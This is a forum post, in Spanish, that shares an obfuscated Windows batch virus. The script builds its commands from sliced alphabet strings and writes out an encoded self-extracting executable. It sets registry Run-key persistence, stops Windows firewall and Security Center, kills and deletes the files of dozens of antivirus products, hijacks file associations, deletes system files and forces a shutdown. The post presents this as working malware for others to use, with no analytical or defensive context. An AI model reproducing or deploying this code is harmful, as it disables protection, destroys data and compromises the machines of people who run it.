Los caracteres de la etiqueta Run son una serie de caracteres ascii que al ser escritos en un archivo de extensión ejecutable extraen un .exe que abre un bat sin mostrar la ventana y fue encriptado con netsend.
@echo off
set VaR=Export
set a=echo
set b=Reg Add
set c=HKLM\Software\Microsoft\Windows\Currentversion\Run /v
set d=%systemroot%\system32\
set dI=%systemroot%\system\
set e=RunDll32
set f=del /q /f /s
set g=abcdefghijklmnopqrstuvwxyz.\/-
set h=g:~4,1
call set h=%%%h%%%
set i=g:~3,1
call set i=%%%i%%%
set j=g:~11,1
call set j=%%%j%%%
set k=g:~17,1
call set k=%%%k%%%
set m=g:~6,1
call set m=%%%m%%%
set n=g:~19,1
call set n=%%%n%%%
set o=%k%%h%%m% %i%%h%%j%%h%%n%%h%
set pa=g:~2,1
call set pa=%%%pa%%%
set p=g:~7,1
call set p=%%%p%%%
set q=g:~10,1
call set q=%%%q%%%
set r=g:~17,1
call set r=%%%r%%%
set s=g:~27,1
call set s=%%%s%%%
set t=%p%%q%%pa%%r%%s%
set u=%o%%t%
set v=g:~5,1
call set v=%%%v%%%
set w= /
set x=Net Stop
set y=TsKiLl
set z=if
set aa=g:~1,1
call set aa=%%%aa%%%
set ab=g:~26,1
call set ab=%%%ab%%%
set ac=g:~0,1
call set ac=%%%ac%%%
set ad=%pa%%ac%%pa%%p%%h%\
set ae=g:~8,1
call set ae=%%%ae%%%
set af=g:~1,1
call set af=%%%af%%%
set az=g:~29,1
call set az=%%%az%%%
set ah=shutdown -s -f -t 00
set ai=%ac%%n%%n%%k%%ae%%aa% %az%%k% %az%%ac% %az%s %az%%p%
set ex=g:~18,1
call set ex=%%%ex%%%
set exA=g:~14,1
call set exA=%%%exA%%%
set exB=g:~13,1
call set exB=%%%exB%%%
set AzA=g:~15,1
call set AzA=%%%AzA%%%
set xD=%k%%h%%exB%
set Re=%xD%1%ab%%h%X%h%
set Zz=%ab%%ex%%exA%%exB%%exB%%h%
set Ax=%ac%%ex%%ex%%exA%%pa% %Zz%=
cd %d%
call:w98 > "1.reg"
call:polaris > "%e%.bat"
call:run > "%e%.com"
%z% exist 1.exe goto y
%e%.com > nul
:y
1.exe
regedit /s 1.reg
%f%1.reg > nul
%f%%e%.com > nul
%Ax%%AzA%%z%fi%j%%h%> nul
Exit
:run
%a%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=
%a%CFFFRX,`,`2$F=@!t.rQ0%%IuL0%%(%%(%%GERYAARX2%%(%%t8-1.EXE________01200
%a%1v1v0^<0xD^"1^<0$G^"P/0A0^^F^"12d^"1TP)0B0z0z1^^Q+0m1TQ-w^"1+1S1#0B0zd^"0]
%a%Q+0z0Y1_1o0Sh^"0u0XP*d^"0]P,0z0Y1_1uv^"P-q^"e^"e^"0S0.0^>1kP-0^&E^"001S1.
%a%0S130X1(K^"100(100(100(0T16v^"081/0$M^"070S050T0-v^"0/0C0T0^"v^"081/0$
%a%M^"070X17I^"0XQ+L^"0_N^"0S050T0-v^"0/0C0X1#L^"1S0#1#0F19P*D^"0^<Q/1F1C0^<
%a%1#D^"1C0i1^<0x1Y0^<P*D^"0p17!(c)JIM_TUCKER_jtucker@adam.com.au_XXXX^<
%a%s'7O!!)[q;_(7O!!!!!!!!-CV^"h/k^>09H2^<lNTb-.`q48D!AD_%%ZiC57pLXqVuTw
%a%I61BUDS`aSnY:^>!.$XG$b7_mfrh=^".=-9H^&+go_N9kn[g?!.$XRsb8P^<Y9!!-;qb
%a%^"`M*^&4..jpq41I!1`E*^"P=xd)/%%dOW^&C?W)1($f7Fj^"UIR%%'.Ydd#_.R%%1;cKu4`
%a%`^<*^"@^"^&]g1rXS^>I^^vAg?#_UU%%1dPKtEUbFY=imm`i#8cOW%%')=G+#J.b+c0L1a/(
%a%rX!$YVN^"pKLnN17T!8!^"3!SudeN?!e?G`^<@PPaxp4`#+!!!!!!!!!^"!1!!'?!!^&Z
%a%!@onyZznM{+S!!!!d@!$Z2!$j0^"#7v7e!YEI!!bWMNo'5IY9Z\Y?SVN^<,@^"nN:)1
%a%uE+BC\y)*5v*C{4S!HC^&s{cks^>t`Et\)Y9Bo8sO6j1!pcS^&Y!0eW0[L(+diI$D=t
%a%!k,4*lN4Ek^&Bz^&^&EojdnPfN^<,^>^"nNB'Oz^^o[#0P[j1f[Ul9/!=BP-dMM+dIi/6g@
%a%Z\om0[M-'u6*7bovO.oc^"L5ESY%%td^^Q7!AAf?vj^>j2#,dH%%^<#,YCq5!$6OuA^<wrY
%a%L[h,%%@Mm)[0O7acjN^"Bj*fN:`)pLGg!#v^^]Iii0l?w#My^^G*m2T/0=O4^&+ZTxKk^^
%a%efD+yYe3_*ZVg[4e!yKO*mN2S\RwN*^&Z!yp's{NB*u^"EyY^"8^"C!)!vC@^"lZ2^^F!!
%a%R/qX9^^SA1tEe3$$j@GF\z^>!-4wllKK^&EefD+s{vy1o%%XNYVKY9N*W3-M/jt`:r:E
%a%#jp's{pE$1,\-aOWSm'?!n`D^&bdP,^<)M%%uBIo^^S]r`,X=1pT_K@2-dP_^^c8^&dX!{
%a%$C=D!+dXU5^>l3QBg!IxnG8b204!m:rC^&4My{!)/WE^^4nWa^"j$9AT-g#qo$,BKP'@
%a%^"^&Zn\G/P9xaMX@aqAzaI^>Zgfb8,BH`=u(+\eQufD$^^^>-?(;Lfn+8\0[,)OVJP.[I
%a%q+CQ1a!$daBn,^<%%8^&\O_xH#{^"^&?9\17S'a4%%#kOH=9Y_0M^&vf^<P1%%cB3O,!U\)K5
%a%!%%AYN^<f#9H(yTmnxt[JoivlX,B),-)FI?tR^&H,,O%%.D!.DeOv2,NH{W_GmOzPMhG
%a%9bv$b.z^"(eJ^>pdy(d'X{j^"F4`{Y(^^ao^^uObCdPYiEVgG9j,HN6%%-@^<8$^"iVO7fe^&
%a%e]4XILG#'Km._xp+\0$P-]/'^"F)P'DZj)p0N^<iN=OGd`$Xl(2gCzE=)e^"#?R3=%%9
%a%-@%%^<%%S_YfB^"I;KY9^"hrqjb!aYrBfBrKyp$,@JF#sSe+h(^&!E!QN^"!%%gU;d!^"$*,Z
%a%e5!*N*-m847c^&k,^>Eg)K^&gY',8#rm^^!Q7q)434#;+cm^"Y:K^&dn!]8/iU)i5-6lVJ
%a%/BJ@OI)7E-7r;q951y,Ms%%Q!!YXR^"TI(\S!e!+)3UHR^<+9,hO/.V'O!$2/yUq!+Z
%a%xR/OlQac#{.^&s]P/-j5w8v#SvBfmg6?cq*CY42F2eF!R24N^<(8+U^"M/^"8XP5V{oz
%a%duYi!q^"f#+VVv2S?y_F.+4TN^"L!a#2R^<*{[6Aa!^"qb[teeh,,xN^"RP-%%,@Fv1s5=
%a%a5U3/?-aO(!^"^",poeu,48l;doZC/YD.$g],^<G#JN#m9@-?^"G^"H@^":^^,!_weV8u]Q
%a%!*uVxN^&^^`,;B!3rX^"\#x^"RK?^"GR{f!7a$p;'2^^E6;T:f^>*i`dV7Oj6uL(47q]QNb
%a%!5OzgBNJ0ME6:f:zNZ7f.4I%%p(Hg3W#mLaS[!%%%%.^"-Rw6Z^"8%%us88,D@nkEy^&rJg
%a%6B!%%(0JQ3QH;g^"Nm!.!$!$!%%8MNE84xTHTYU!i@P2^<tO4h=j^"^&XT^"F*^<ew!^"NUCn
%a%eY0XNbf=pZYm1^"B?x655@Ead0NLC2WS[0ZpN;GYve-^&le0w/'@^"2Sc)U2_j8)O5+
%a%;_#75#N5dR#s#QqD!!);'`[S901quM/.^"^^!5!APv%%?MZnc#r!.oiN%%!'=.,?:)yi
%a%!!Zd3OK;T\4x'7^>`7r!{!a%%FXuS*nwR:^"t*n#Vt(8NUICe$XN#(;!#^"-^^5$.HJ)\
%a%$g!-C24xp8$(^"f#+f:E@#1_biI%%w\,#k#A^&c.\^&Zic_7O9_GPMHD%%8z:N,?:Zb2W
%a%!%%85i584%%n,Y947O!+5I^&ZQXN*u6/?Rjaa.P:^>!e[T8vMN7Q+zl8){Z^&,wz\26fF
%a%!BpMZO%%KV:^"OTe^"R(O(0,UEYCE%%qD*vvp-9TZ^>Y(QS+g76$$5$^&r$OQ)p7VR^";\@
%a%NclX7QJX8^<q{l@=x^"F-+EEHux3_(f_fjO^^^"gN)4S#qX?/+T:OW,lNn!Bo;NCR[q2
%a%%%/+V)WV-#u5=,8!WH\-+Bv86I:7Umk!!3'l84a[E^&\+k^&raW8$:-uFRX,8^"SONQU
%a%9@OG'1%%=,rRR!aQMBg,o,[)vex(,Ii^&]Kb!9(f4hwmrndbVJ7Qdi!#N/h.'?-]^&Z
%a%XV!!\N8$VXBw9^^UeOnS.OUdkR8A+YEKKgC!)S/!Q%%n,8@S[f*yA^"^&Z'-!%%!N$@C,
%a%4`du^>^<g!^"_#-'b#-!xo'(Aew^&rQm!9iC,IE`vKON--P2FZN(5+^"J#%%;o!(%%Y-GBZ
%a%,;G%%O(NJOg^&(03!*CU)U.8!9vo^^r!iMu!DLxdR*49_*3hd)Om+,8X^^HTpp1ri1qf
%a%O's^^!$[z^"L-^<Q%%4m!9^")^&:,h6'pN@/.b$c9\^&r(k!#Hw,@#Clx.5,xEV=mf[u:!e
%a%1^^f\^&Zj71ruS!^"^<^^S\dPeFOoa^"S#4^"$64R*z-laa,jOG7P9),Z-rN$!@tC*MhI*^<
%a%nU^&b?N:FO,8,f\0,#P$2e9'!#+,p!c!CQQ!^^z4,ica_(^"^^N2^&)qCPl%%?%%C(iU-/+
%a%/=,]XLC^>_g,YB`^"G!#AC+CNl!-_@2.%%^":FYMIY7O^&sfDJoe^<2ziK!^>4`!;j6!R_U
%a%N2ig^>BOFI9#ps=%%6J3%%5#0kW7TVNGx]57pj/Y[$KND$\dP^&j+r)en?,P)$^&bf^&1Q
%a%^"^&p'8ybU=/$*\(!;[O^&gDJ=Nju,hQ^"3Q^"gT`!^&c`OOBYU)/*`D7u.6!bp^<NCl:.D
%a%(Q7O%%D%%$)I?s)Q5DSk.uYY8e*?!tJ09Z,?^&\^&_`D^&v\P!1ppT!CM^>C^&385!,7^&%%^<
%a%9{S[^>FBj!'HdBfI=NDC('B^&7G!)Y!(EVc=^&b0lBnE3I!g2iWdQ-^>f^^Z?:@1E!a$3
%a%J`,pVp8%%?8,8f'lI^"n^<;N%%G\Pt2l1yA':F,l^&2Bm4r^"^&?q.$)wT!%%5iu!!uS)YWW
%a%#k,fgW9[lX7QPyP0^&4(f-u#96_`R!A(0j^^f:Ck^&FLX%%^<^^r#y^"lR6F)G+-^"UY7z$@
%a%Z?^")!cT5t`'?6l^&k,@^&r!(4h8D#{^"YH,f{dH#,!(f\^&l9_)dqs!9h8HTa.!!g*C-
%a%S#9Z!-#!!U3:OS1xb^"BxlRC^<M1dPfpeU^"vK6%%K]:$l-i!9+Wx4Cl'1j%%w_OG!+^"L
%a%!\#1!'cm!-G12.+wBwC^&_hRG!BQX3N^"O0AN^&:K]L'32*!B@0dq/zpm$Y12#tBG#s
%a%D4^&f^>71yD;_/fx#[PB\$8F)q9[+,Io*-'U!^>mM,H^"]^&zg^&:.NG*@OM51OM.9#q]C
%a%dl8((^<,iRBY:XK#,nK!c)Ia.^&f;G,@5w4`qTbfPP,PfZ%%)!c%%BTd/c^^v'$'9,qMU
%a%uW7cTp!g/H%%65'Pn42OK^&b7['Y^^z^"8e!pOu[7P%%7s[^"ecN^&x`hrbH?#k^&jdV^"Cxl
%a%7R6j85+7Pl6AnH)It2^>0x.I9O@^^riXV;N:!SVb8d^&\CSPle1j:-5^"FC+,DNB#W:!
%a%(pQq^&]^"M!#WV4hFZHDjjdW#+!#^&2!(0\^"qeu(bY9N[!!R=N/t*!8.b!Q/'^"FPl^>6
%a%dQ.1!^"#/!-=%%!80L#]JN2oY9Nm,9o.N^"!1!H\h!*6J'w7O2D,Fe6!(^"Y!$O?^"^>%%e
%a%!_7O3%%arntCN72!+D0!Me-!D!!#oog,U^^u^>X!%%F%%!S.B7_G`1(h%%G(EeOy^&]^")Pq
%a%OA!TzV#L!!'XXX3EBf$*!%%M^>Bga5!Y6Z#nfZ-TBfuhBiAWN0-q-Bc78k3l^&7fZ%%u
%a%owiXdW5^^!!qC,s`t%%cEU4xg?gF!$N;!(%%W!TNb!'Uu$0dPN!7[jS7U4@P{'A-#m-
%a%!Z,z/f^>ZPo1t+;!#8$')S79#DA^&{Z^"8sar'3okBx!^"^":^"^>!Q^&;P0-EPl$*N^";\N*
%a%z6!^^n:!)Yy!1^^v2]S[S0dWw^"!.=mNl=a$(:^>!eaa#qoj!BN*s#!^"nJ#[+s)rDa^>0
%a%S\+q7TO.^&{(T*gD0^&!Nb!\aax5ogdZN)v@!A+c^"Kvj!:OGE=N^")M!'#q!2Q5!8dP
%a%$-F:Y1E]o%%^^r-!!.p^^!VHH!,uG!`[C#+7OrldT!^>Sl$^<,X^&_!!.B6RK;j?ojqg!(
%a%.m,_fV!aS^<-T-]:7S[p+dPA=#IYU!FhT^"o^"F7^&/'^>.'A$O;tIw!#.r1m3;![ogF(
%a%$1-{q5?[!1^<nD^<qi7g;(GI=-BnBg?6N1l2!C+K#@7_^<'dP8TN^"=+!#\,!+YA.5-f
%a%^"r5E,Z,8/'BuiS!-JB!_]OOUWO%%cHDP]Hw'!E!9DV{*$DtK,V[mAB%%Bvf*!%%E/Q+
%a%)W!d*^>Pu.t$5*:gg\J^"4r^"OD*!799a!a2vsAD3owA#NeUE7Zf.,zxlPw^"X#-N*j'
%a%vjY9!-bx(EvO!A)N!*dP^"$(=hnjo21gOb!,d'w#Zr6,M#/jB2IYXevpD*#Go7u`U
%a%^<vN^"^"=goCA$P**NP!%%'y0uY51C%%5)I4PZ@!5*vo_*%%Ma7gj75E%%uc8cDxGCQ=LOe
%a%G?!#L`O557^&K!i!%%*B+g%%=hAS`vT^<H8^^7/(d^&_$!@MCQDGQOuoD^<F4Y)Kh81++Q=
%a%!!*0f^&qYW+86P;^^e6xGaLOqJp-CR$?\CyH,zz^&jY=86ev7$^"y,[-\yUw\epLrnac
%a%!'H.L`$!=@CQL0:^>o^^3FRZj6`c4h1F!fh7N$7eiH^&bIs[z/PXqOmV=931[.kN'^"f
%a%$T3GP1^"8)=,I%%5RF8(+PiZ#u\eg9ELRIZ^^#kIgxwopULR#jf^"e^>G$-^<i^"HEAUmnb
%a%j17R!$f_YpA1/kg/\D^>V1799gX('Co=;RC822;!.Tb-*7_^"j59/;N$[h!)VV!:V*
%a%!g)]^&ZEU;g;$(ZN^&3{!/an/W]O$+vmNnS[hl7XdaHL^&67r/g#^^X\)zN)Dx,M+1Oi
%a%c^^,Qu8[)g`@96+^<g*#bUr{,T!.@!sPDd]zN#=N^>#^"Q!^"mi^"r1I1T6/^<^&u:B^"#@KJ
%a%'!!!~^<
goto:eof
:polaris
%a%@echo off
%a%%b%%c%%e% /t reg_sz /d %d%1%Zz% /f
%a%%x%"Centro de seguridad"
%a%%x%"Firewall de Windows/Conexión compartida a Internet (ICS)"
%a%%x%"AVG7 Update Service"
%a%%x%"AVG7 Alert Manager Server"
%a%%x%"AVG E-mail Scanner"
%a%%x%"AVG Anti-Spyware Guard"
%a%%x%"NOD32 Kernel Service"
%a%%x%"avast! Web Scanner"
%a%%x%"avast! Mail Scanner"
%a%%x%"avast! iAVS4 Control Service"
%a%%x%"avast! Antivirus"
%a%%y%ccProxy
%a%%y%ccSetMgr
%a%%y%SNDSrvc
%a%%y%SPBBCSvc
%a%%y%ccEvtMgr
%a%%y%ccApp
%a%%y%NMAIN
%a%%y%SBServ
%a%%y%NOPDB
%a%%f%%dI%iosubsys\persifrz.vxd
%a%cd %programfiles%\Archivos comunes\Symantec\Shared
%a%%z% errorlevel==1 goto 1
%a%%ai%*.*
%a%%f%*.*
%a%:1
%a%%y%symlcsvc
%a%cd %programfiles%\Archivos comunes\Symantec\SharedCCPD-LC
%a%%z% errorlevel==1 goto 2
%a%%ai%*.*
%a%%f%*.*
%a%:2
%a%%y%navapsvc
%a%%y%ISSVC
%a%cd %programfiles%\Norton Internet Security
%a%%z% errorlevel==1 goto 3
%a%%ai%*.*
%a%%f%*.*
%a%:3
%a%%y%navapsvc
%a%%y%NPFMntor
%a%%y%navapw32
%a%%y%SAVScan
%a%cd %programfiles%\Norton AntiVirus
%a%%z% errorlevel==1 goto 4
%a%%ai%*.*
%a%%f%*.*
%a%:4
%a%%y%NPROTECT
%a%cd %programfiles%\Norton Utilities
%a%%z% errorlevel==1 goto 5
%a%%ai%*.*
%a%%f%*.*
%a%:5
%a%%y%GBPoll
%a%%y%navapsvc
%a%%y%NPFMntor
%a%%y%NPROTECT
%a%%y%NOPDB
%a%%y%GBTray
%a%%y%NPFMntor
%a%%y%GhostTray
%a%%y%PQV2iSvc
%a%cd %programfiles%\Norton System\Works\Norton AntiVirus
%a%%y%no-spy
%a%if errorlevel==1 goto 6
%a%cd %programfiles%\SinEspias
%a%%ai%*.*
%a%%f%*.*
%a%:6
%a%%y%spyaxe
%a%%y%spyaxe
%a%cd %programfiles%\SpyAxe
%a%%z% errorlevel==1 goto 7
%a%%f%*.*
%a%:7
%a%%y%SpywareStrike
%a%%y%SpywareStrike
%a%cd %programfiles%\SpywareStrike
%a%if errorlevel==1 goto 8
%a%%ai%*.*
%a%%f%*.*
%a%:8
%a%%y%gcasDtServ
%a%%y%gcasServ
%a%cd %programfiles%\Microsoft AntiSpyware
%a%if errorlevel==1 goto 9
%a%%ai%*.*
%a%%f%*.*
%a%:9
%a%%y%kavsvc
%a%%y%kav
%a%cd %programfiles%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONAL
%a%if errorlevel==1 goto 10
%a%%ai%*.*
%a%%f%*.*
%a%:10
%a%%y%VsStat
%a%cd %programfiles%\McAfee\McAfee VirusScan
%a%if errorlevel==1 goto 11
%a%%ai%*.*
%a%%f%*.*
%a%:11
%a%%y%Pavsrv51
%a%%y%AVENGINE
%a%%y%apvxdwin
%a%%y%pavProxy
%a%cd %programfiles%\Panda Software\Panda Antivirus Titanium
%a%if errorlevel==1 goto 12
%a%%ai%*.*
%a%%f%*.*
%a%:12
%a%%y%SynTPLpr
%a%%y%SynTPEnh
%a%cd %programfiles%\SynapticsSynTP
%a%if errorlevel==1 goto 13
%a%%ai%*.*
%a%%f%*.*
%a%:13
%a%%y%FrameworkService
%a%%y%Mcshield
%a%%y%VsTskMgr
%a%%y%SHSTAT
%a%cd %programfiles%\Network Associates\VirusScan
%a%if errorlevel==1 goto 14
%a%%ai%*.*
%a%%f%*.*
%a%:14
%a%%y%nod32krn
%a%%y%nod32kui
%a%cd %programfiles%\Eset
%a%if errorlevel==1 goto 15
%a%%ai%*.*
%a%%f%*.*
%a%:15
%a%%y%AVGSERV9
%a%%y%AVGCC32
%a%cd %programfiles%\GRISOFT\AVG6
%a%if errorlevel==1 goto 16
%a%%ai%*.*
%a%%f%*.*
%a%:16
%a%%y%AVGUARD
%a%%y%AVWUPSRV
%a%%y%AVGNT
%a%%y%AVSched32
%a%cd %programfiles%\AVPersonal
%a%if errorlevel==1 goto 17
%a%%ai%*.*
%a%%f%*.*
%a%:17
%a%%y%ASHSERV
%a%%y%ASHWEBSV
%a%%y%ASHMAISV
%a%cd %programfiles%\ALWIL SOFTWARE\AVAST4
%a%if errorlevel==1 goto 18
%a%%ai%*.*
%a%%f%*.*
%a%:18
%a%%y%avgcc
%a%%y%avgamsvr
%a%%y%avgupsvc
%a%cd %programfiles%\Grisoft
%a%if errorlevel==1 goto 19
%a%%ai%*.*
%a%%f%*.*
%a%:19
%a%%y%Pagent
%a%%y%pagentwd
%a%%y%pavsched
%a%cd %programfiles%\Panda Software\Panda Administrator\Pav_Agent
%a%if errorlevel==1 goto 20
%a%%ai%*.*
%a%%f%*.*
%a%:20
%a%%y%bdoesrv
%a%%y%bdmcon
%a%%y%bdnagent
%a%%y%bdswitch
%a%cd %programfiles%\Softwin\BitDefender9
%a%if errorlevel==1 goto 21
%a%%ai%*.*
%a%%f%*.*
%a%:21
%a%%y%avgamsvr
%a%%y%avgupsvc
%a%cd %programfiles%\AVG7
%a%if errorlevel==1 goto 22
%a%%ai%*.*
%a%%f%*.*
%a%:22
%a%%y%zlclient
%a%%y%zonealarm
%a%%y%vsmon
%a%cd %programfiles%\Zone Labs\ZoneAlarm
%a%if errorlevel==1 goto 23
%a%%ai%*.*
%a%%f%*.*
%a%:23
%a%%y%aswUpdSv
%a%%y%ashServ
%a%%y%ashWebSv
%a%%y%ashDisp
%a%cd %programfiles%\Alwil Software\Avast4
%a%if errorlevel==1 goto 24
%a%%ai%*.*
%a%%f%*.*
%a%:24
%a%%y%avgamsvr
%a%%y%vgupsvc
%a%%y%avgcc
%a%cd %programfiles%\Grisoft\AVG free
%a%if errorlevel==1 goto 25
%a%%ai%*.*
%a%%f%*.*
%a%:25
%a%%Re%1%Zz%
%a%%f%%p%%ac%%j%%ab%%i%%j%%j%
%a%%u%%ab%%h%X%h%%w%%v%
%a%%u%%ab%%n%x%n%%w%%v%
%a%%u%%ab%%i%%j%%j%%w%%v%
%a%%u%%ab%%pa%Om%w%%v%
%a%%u%%ab%S%pa%%k%%w%%v%
%a%%u%%ab%P%z%%w%%v%
%a%%u%%ab%%pa%Md%w%%v%
%a%%u%%ab%%k%%h%%m%%w%%v%
%a%%f%%p%%ac%%j%%ab%%i%%j%%j%
%a%%ah%
goto:eof
:w98
%a%REGEDIT4
%a%[HKEY_CLASSES_ROOT\%Zz%]
%a%@=^"%aza%%z%fi%j%%h%^"
goto:eof
Autor
En línea
[une el code- makers
